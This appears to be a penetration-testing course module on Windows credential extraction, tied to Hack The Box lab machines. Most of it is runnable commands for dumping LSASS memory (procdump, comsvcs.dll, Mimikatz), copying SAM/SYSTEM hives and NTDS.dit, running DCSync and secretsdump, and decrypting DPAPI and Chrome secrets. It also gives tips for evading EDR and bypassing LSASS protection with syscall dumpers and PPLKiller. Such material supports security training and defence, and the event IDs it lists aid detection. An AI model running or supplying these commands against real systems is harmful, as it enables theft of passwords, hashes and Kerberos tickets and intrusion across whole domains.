Back to All Modules

LSASS & Credential Extraction

#Overview

The Local Security Authority Subsystem Service (LSASS) stores credentials in memory for authentication purposes. Extracting these credentials — including plaintext passwords, NTLM hashes, and Kerberos tickets — is one of the most powerful post-exploitation techniques on Windows. Combined with SAM/SYSTEM hive extraction and DPAPI decryption, this provides comprehensive credential access.

#Prerequisites

  • Administrator or SYSTEM access (or SeDebugPrivilege)
  • Ability to run tools on the target (or remote extraction via SMB/WinRM)

#Detection & Enumeration

# Check if LSASS protection is enabled
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL

# Check for Credential Guard
reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v Enabled

# Check for Windows Defender Credential Protection
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard
POWERSHELL

#Exploitation / Execution

#LSASS Memory Dumping

:: Method 1: Procdump (Microsoft-signed, less suspicious)
procdump.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp

:: Method 2: comsvcs.dll (built-in, no tool drop)
rundll32.exe comsvcs.dll MiniDump <lsass_PID> C:\temp\lsass.dmp full

:: Find LSASS PID first
tasklist /fi "imagename eq lsass.exe"

:: Method 3: Task Manager (GUI)
:: Right-click lsass.exe → Create dump file

:: Method 4: Mimikatz (in-memory)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
CMD

#Extracting from LSASS Dump Offline

# On attacker machine, parse the dump
pypykatz parse lsass.dmp

# Or with Mimikatz on the target
mimikatz # sekurlsa::minidump C:\temp\lsass.dmp
mimikatz # sekurlsa::logonpasswords
BASH

#SAM & SYSTEM Hive Extraction

:: Method 1: Registry save (requires admin)
reg save hklm\sam C:\temp\sam.bak
reg save hklm\system C:\temp\system.bak

:: Method 2: Volume Shadow Copy (requires admin)
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\sam.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\system.bak

:: Method 3: diskshadow (as Backup Operator)
diskshadow
DISKSHADOW> set context persistent
DISKSHADOW> add volume C: alias vss1
DISKSHADOW> create
DISKSHADOW> exec copy %vss1%\Windows\System32\config\SAM C:\temp\sam.bak
DISKSHADOW> exit

:: Parse offline with secretsdump
impacket-secretsdump.py -sam sam.bak -system system.bak LOCAL
CMD

#Mimikatz Key Commands

mimikatz # privilege::debug

:: Dump all credentials from LSASS
mimikatz # sekurlsa::logonpasswords

:: Dump Kerberos tickets
mimikatz # sekurlsa::tickets /export

:: Dump cached domain credentials
mimikatz # lsadump::cache

:: Dump SAM database
mimikatz # lsadump::sam

:: Dump domain credentials from NTDS.dit (on DC)
mimikatz # lsadump::lsa /inject

:: Dump DCSync (requires Replication permissions)
mimikatz # lsadump::dcsync /domain:htb.local /all /csv
CMD

#DPAPI (Data Protection API)

:: Find DPAPI master keys
dir /s C:\Users\*\AppData\Local\Microsoft\Credentials
dir /s C:\Users\*\AppData\Roaming\Microsoft\Credentials

:: Decrypt DPAPI blobs with Mimikatz
mimikatz # dpapi::cred /in:C:\Users\user\AppData\Local\Microsoft\Credentials\{GUID}

:: Decrypt Chrome saved passwords
mimikatz # dpapi::chrome /in:"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"

:: Backup key extraction (domain DPAPI backup key)
mimikatz # dpapi::backupkey /domain:htb.local
CMD

#Credential Manager

:: List stored credentials
cmdkey /list

:: Vaultcmd for web credentials
vaultcmd /listcreds:"Windows Credentials" /all
CMD

#Browser Credential Extraction

# Chrome passwords (using SharpChromium or manually)
# Decrypt with DPAPI master key
POWERSHELL

#NTDS.dit Extraction from Domain Controller

# Using secretsdump remotely (requires admin on DC)
impacket-secretsdump.py 'domain.local/admin:password@10.10.10.10' -just-dc-ntlm

# Using secretsdump with hashes
impacket-secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:3f79bb9ef926e3d4e7c5f15e5f0e0c6a 'domain.local/admin@10.10.10.10'

# Local extraction on DC via ntdsutil
ntdsutil "activate instance ntds" "ifm" "create full C:\ntds_dump" quit quit

# Then parse
impacket-secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
BASH

#nanodump

:: nanodump — Modern LSASS dump using syscalls (bypasses EDR hooks)
nanodump.exe --write C:\temp\lsass.dmp
:: Uses direct syscalls (NtReadVirtualMemory) instead of Windows API
:: No new process creation, no handle duplication, no minidump API
:: Harder for EDR to detect than procdump or comsvcs.dll
CMD

#lsassy

# lsassy — Remote LSASS dump via NetExec
nxc smb <target> -u administrator -p pass -M lsassy
# Dumps LSASS remotely without uploading any binary to target
# Uses SMB + remote task scheduling
BASH

#Dumpert

:: Dumpert — LSASS dump via direct syscalls (outflanknl/Dumpert)
:: Uses NtReadVirtualMemory syscall stubs directly
:: Compiles to a position-independent shellcode
:: No API calls that EDR hooks monitor
CMD

#handlekatz

:: handlekatz — LSASS dump via handle duplication
:: Clones the LSASS process handle and reads memory
:: Avoids OpenProcess which is commonly hooked by EDR
:: GitHub: citronneur/handlekatz
CMD

#Complete comsvcs.dll MiniDump Workflow

:: Complete comsvcs.dll MiniDump workflow
:: Step 1: Find LSASS PID
tasklist /fi "imagename eq lsass.exe"
:: Output: lsass.exe    <PID>    Services    0    11,xxx K

:: Step 2: Dump using comsvcs.dll (built-in, no tool drop needed)
rundll32.exe comsvcs.dll MiniDump <PID> C:\temp\lsass.dmp full
:: The 'full' flag ensures complete memory dump

:: Step 3: Transfer lsass.dmp to attacker machine

:: Step 4: Parse offline
pypykatz parse lsass.dmp
:: Or on Windows with Mimikatz:
mimikatz # sekurlsa::minidump C:\temp\lsass.dmp
mimikatz # sekurlsa::logonpasswords
CMD

#Mimikatz Output Interpretation

When running sekurlsa::logonpasswords, the output contains:

FieldDescriptionUse
NTLMNTLM hash of the passwordPTH, offline cracking with hashcat
SHA1SHA1 hash of the passwordLess commonly used
aes256-cts-hmac-sha1-96Kerberos AES-256 encryption keyOverpass-the-Hash, Kerberoasting
aes128-cts-hmac-sha1-96Kerberos AES-128 encryption keyOverpass-the-Hash
des-cbc-md5DES encryption keyLegacy, rarely useful
DPAPIDPAPI master key GUID + SHA1 hashDPAPI credential decryption

Key indicators:

  • If NTLM shows 00000000000000000000000000000000 — Credential Guard is active, dump is useless
  • If all fields are empty/zeros — RunAsPPL may be blocking access
  • Multiple entries for same user = multiple logon sessions (check timestamps)

#Credential Guard and RunAsPPL

# Credential Guard — LSASS returns encrypted/garbage data when active
# Detection:
reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v Enabled
# If Credential Guard is active, LSASS memory is virtualized by Hyper-V
# ALL LSASS dump techniques return garbage — this is BY DESIGN
# Alternative: Extract DPAPI backup keys from Domain Controller instead
impacket-secretsdump.py 'domain.local/admin:pass@dc-ip' -just-dc

# RunAsPPL — Protected Process Light prevents LSASS access
# Detection:
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL
# If RunAsPPL=2 (PPL with Elastic), use PPLKiller:
# PPLKill: https://github.com/Mattiwatti/PPLKiller
# Requires: Administrator + SeLoadDriverPrivilege (to load the kill driver)
POWERSHELL

#Common Pitfalls

  • ⚠️ LSASS protection (RunAsPPL) prevents memory dumping — use PPLKill or disable via registry with SYSTEM access
  • ⚠️ Credential Guard (virtualization-based) makes most LSASS dumping techniques fail — only DPAPI backup key method works
  • ⚠️ Windows Defender and EDR flag procdump and Mimikatz — use comsvcs.dll or syscalls for stealth
  • ⚠️ NTLM hashes from LSASS may include stale cached credentials — verify they're current
  • ⚠️ DCSync requires Replication-Get-Changes-All + Replication-Get-Changes permissions on the domain head

#OPSEC Considerations

  • 🛡️ LSASS access generates Event ID 4663 (Process Access) with Process Name lsass.exe
  • 🛡️ Procdump creates Event ID 4688 (Process Creation) and is commonly flagged by EDR
  • 🛡️ comsvcs.dll MiniDump is quieter but still detectable by advanced EDR
  • 🛡️ Registry save operations generate Event ID 4657 when Object Access auditing is enabled
  • 🛡️ Credential dumping is the #1 technique detected by enterprise EDR solutions

#Post-Exploitation Value

LSASS credential extraction provides the highest return on investment in post-exploitation. A single dump can yield plaintext passwords, NTLM hashes, and Kerberos tickets for all recently authenticated users, enabling lateral movement across the entire domain.

#Tool References

ToolLink
Mimikatzhttps://github.com/gentilkiwi/mimikatz
Procdumphttps://docs.microsoft.com/en-us/sysinternals/downloads/procdump
Impacket secretsdumphttps://github.com/fortra/impacket
Pypykatzhttps://github.com/skelsec/pypykatz
SharpChromiumhttps://github.com/djhohnstein/SharpChromium

#Source Machines

  • Forest (Easy, AD)
  • Cascade (Medium, AD/Windows)
  • Blackfield (Medium, AD/Windows)
  • Jeeves (Medium, Windows)
  • Support (Easy, Windows)
  • StreamIO (Hard, Windows)